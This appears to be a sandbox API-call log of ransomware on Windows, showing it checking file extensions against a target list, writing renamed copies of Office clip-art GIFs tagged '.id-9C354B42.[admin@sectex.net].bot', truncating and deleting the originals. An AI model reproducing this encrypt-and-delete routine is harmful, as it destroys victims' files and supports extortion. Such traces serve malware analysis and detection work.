	[0056.814] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00139_.gif")) returned 1
	[0056.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.814] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.814] lstrlenW (lpString=".doc") returned 4
	[0056.814] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.814] lstrlenW (lpString=".docx") returned 5
	[0056.814] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.814] lstrlenW (lpString=".pdf") returned 4
	[0056.814] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.814] lstrlenW (lpString=".xls") returned 4
	[0056.814] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.814] lstrlenW (lpString=".xlsx") returned 5
	[0056.815] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.815] lstrlenW (lpString=".ppt") returned 4
	[0056.815] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.815] lstrlenW (lpString=".zip") returned 4
	[0056.815] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.815] lstrlenW (lpString=".rar") returned 4
	[0056.815] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.815] lstrlenW (lpString=".bz2") returned 4
	[0056.815] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.815] lstrlenW (lpString=".7z") returned 3
	[0056.815] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.815] lstrlenW (lpString=".dbf") returned 4
	[0056.815] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.815] lstrlenW (lpString=".1cd") returned 4
	[0056.815] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.815] lstrlenW (lpString=".jpg") returned 4
	[0056.815] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.815] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.815] lstrlenW (lpString=".doc") returned 4
	[0056.815] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.815] lstrlenW (lpString=".docx") returned 5
	[0056.815] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.815] lstrlenW (lpString=".pdf") returned 4
	[0056.815] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.815] lstrlenW (lpString=".xls") returned 4
	[0056.815] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.815] lstrlenW (lpString=".xlsx") returned 5
	[0056.815] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.815] lstrlenW (lpString=".ppt") returned 4
	[0056.816] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.816] lstrlenW (lpString=".zip") returned 4
	[0056.816] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.816] lstrlenW (lpString=".rar") returned 4
	[0056.816] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.816] lstrlenW (lpString=".bz2") returned 4
	[0056.816] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.816] lstrlenW (lpString=".7z") returned 3
	[0056.816] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.816] lstrlenW (lpString=".dbf") returned 4
	[0056.816] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.816] lstrlenW (lpString=".1cd") returned 4
	[0056.816] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.816] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00139_.GIF") returned 63
	[0056.816] lstrlenW (lpString=".jpg") returned 4
	[0056.816] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.816] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.816] lstrlenW (lpString="AG00172_.GIF") returned 12
	[0056.816] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.817] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=4390) returned 1
	[0056.817] CloseHandle (hObject=0x1f8) returned 1
	[0056.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 0x20
	[0056.817] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.817] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.817] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.818] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.818] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238
	[0056.818] GetLastError () returned 0x0
	[0056.818] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x1126, lpOverlapped=0x0) returned 1
	[0056.820] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0x1130, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0x1130, lpOverlapped=0x0) returned 1
	[0056.820] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.821] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.821] SetEndOfFile (hFile=0x238) returned 1
	[0056.821] CloseHandle (hObject=0x238) returned 1
	[0056.821] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.821] SetEndOfFile (hFile=0x1f8) returned 1
	[0056.822] CloseHandle (hObject=0x1f8) returned 1
	[0056.823] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.823] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00172_.gif")) returned 1
	[0056.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.823] lstrlenW (lpString=".doc") returned 4
	[0056.823] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.823] lstrlenW (lpString=".docx") returned 5
	[0056.823] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.823] lstrlenW (lpString=".pdf") returned 4
	[0056.823] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.823] lstrlenW (lpString=".xls") returned 4
	[0056.823] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.823] lstrlenW (lpString=".xlsx") returned 5
	[0056.823] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.823] lstrlenW (lpString=".ppt") returned 4
	[0056.823] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.823] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.823] lstrlenW (lpString=".zip") returned 4
	[0056.823] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.823] lstrlenW (lpString=".rar") returned 4
	[0056.823] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.823] lstrlenW (lpString=".bz2") returned 4
	[0056.824] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.824] lstrlenW (lpString=".7z") returned 3
	[0056.824] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.824] lstrlenW (lpString=".dbf") returned 4
	[0056.824] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.824] lstrlenW (lpString=".1cd") returned 4
	[0056.824] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.824] lstrlenW (lpString=".jpg") returned 4
	[0056.824] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.824] lstrlenW (lpString=".doc") returned 4
	[0056.824] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.824] lstrlenW (lpString=".docx") returned 5
	[0056.824] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.824] lstrlenW (lpString=".pdf") returned 4
	[0056.824] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.824] lstrlenW (lpString=".xls") returned 4
	[0056.824] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.824] lstrlenW (lpString=".xlsx") returned 5
	[0056.824] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.824] lstrlenW (lpString=".ppt") returned 4
	[0056.824] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.824] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.824] lstrlenW (lpString=".zip") returned 4
	[0056.824] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.824] lstrlenW (lpString=".rar") returned 4
	[0056.824] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.824] lstrlenW (lpString=".bz2") returned 4
	[0056.824] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.824] lstrlenW (lpString=".7z") returned 3
	[0056.824] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.825] lstrlenW (lpString=".dbf") returned 4
	[0056.825] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.825] lstrlenW (lpString=".1cd") returned 4
	[0056.825] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.825] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00172_.GIF") returned 63
	[0056.825] lstrlenW (lpString=".jpg") returned 4
	[0056.825] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.825] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.825] lstrlenW (lpString="AG00174_.GIF") returned 12
	[0056.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.825] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3966) returned 1
	[0056.825] CloseHandle (hObject=0x1f8) returned 1
	[0056.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 0x20
	[0056.825] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.825] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.826] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.826] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.826] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238
	[0056.826] GetLastError () returned 0x0
	[0056.826] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xf7e, lpOverlapped=0x0) returned 1
	[0056.827] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xf80, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xf80, lpOverlapped=0x0) returned 1
	[0056.828] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.828] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.828] SetEndOfFile (hFile=0x238) returned 1
	[0056.828] CloseHandle (hObject=0x238) returned 1
	[0056.829] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.829] SetEndOfFile (hFile=0x1f8) returned 1
	[0056.829] CloseHandle (hObject=0x1f8) returned 1
	[0056.829] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.830] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00174_.gif")) returned 1
	[0056.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.830] lstrlenW (lpString=".doc") returned 4
	[0056.830] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.830] lstrlenW (lpString=".docx") returned 5
	[0056.830] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.830] lstrlenW (lpString=".pdf") returned 4
	[0056.830] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.830] lstrlenW (lpString=".xls") returned 4
	[0056.830] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.830] lstrlenW (lpString=".xlsx") returned 5
	[0056.830] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.830] lstrlenW (lpString=".ppt") returned 4
	[0056.830] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.830] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.830] lstrlenW (lpString=".zip") returned 4
	[0056.830] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.830] lstrlenW (lpString=".rar") returned 4
	[0056.830] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.830] lstrlenW (lpString=".bz2") returned 4
	[0056.830] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.830] lstrlenW (lpString=".7z") returned 3
	[0056.830] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.831] lstrlenW (lpString=".dbf") returned 4
	[0056.831] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.831] lstrlenW (lpString=".1cd") returned 4
	[0056.831] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.831] lstrlenW (lpString=".jpg") returned 4
	[0056.831] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.831] lstrlenW (lpString=".doc") returned 4
	[0056.831] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1
	[0056.831] lstrlenW (lpString=".docx") returned 5
	[0056.831] lstrcmpiW (lpString1=".docx", lpString2="_.GIF") returned -1
	[0056.831] lstrlenW (lpString=".pdf") returned 4
	[0056.831] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1
	[0056.831] lstrlenW (lpString=".xls") returned 4
	[0056.831] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1
	[0056.831] lstrlenW (lpString=".xlsx") returned 5
	[0056.831] lstrcmpiW (lpString1=".xlsx", lpString2="_.GIF") returned -1
	[0056.831] lstrlenW (lpString=".ppt") returned 4
	[0056.831] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1
	[0056.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.831] lstrlenW (lpString=".zip") returned 4
	[0056.831] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1
	[0056.831] lstrlenW (lpString=".rar") returned 4
	[0056.831] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1
	[0056.831] lstrlenW (lpString=".bz2") returned 4
	[0056.831] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1
	[0056.831] lstrlenW (lpString=".7z") returned 3
	[0056.831] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1
	[0056.831] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.831] lstrlenW (lpString=".dbf") returned 4
	[0056.832] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1
	[0056.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.832] lstrlenW (lpString=".1cd") returned 4
	[0056.832] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1
	[0056.832] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00174_.GIF") returned 63
	[0056.832] lstrlenW (lpString=".jpg") returned 4
	[0056.832] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1
	[0056.832] lstrcmpiW (lpString1=".GIF", lpString2=".bot") returned 1
	[0056.832] lstrlenW (lpString="AG00175_.GIF") returned 12
	[0056.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.832] GetFileSizeEx (in: hFile=0x1f8, lpFileSize=0xa69ff1c | out: lpFileSize=0xa69ff1c*=3378) returned 1
	[0056.832] CloseHandle (hObject=0x1f8) returned 1
	[0056.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 0x20
	[0056.832] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0056.832] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f8
	[0056.833] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.833] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.833] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x238
	[0056.833] GetLastError () returned 0x0
	[0056.833] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0xd32, lpOverlapped=0x0) returned 1
	[0056.834] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xd40, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xd40, lpOverlapped=0x0) returned 1
	[0056.835] ReadFile (in: hFile=0x1f8, lpBuffer=0xb1c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa69fed4, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesRead=0xa69fed4*=0x0, lpOverlapped=0x0) returned 1
	[0056.835] WriteFile (in: hFile=0x238, lpBuffer=0xb1c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa69fc9c, lpOverlapped=0x0 | out: lpBuffer=0xb1c0020*, lpNumberOfBytesWritten=0xa69fc9c*=0xec, lpOverlapped=0x0) returned 1
	[0056.835] SetEndOfFile (hFile=0x238) returned 1
	[0056.836] CloseHandle (hObject=0x238) returned 1
	[0056.836] SetFilePointerEx (in: hFile=0x1f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa69fec8 | out: lpNewFilePointer=0x0) returned 1
	[0056.836] SetEndOfFile (hFile=0x1f8) returned 1
	[0056.837] CloseHandle (hObject=0x1f8) returned 1
	[0056.837] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0056.837] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AG00175_.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ag00175_.gif")) returned 1
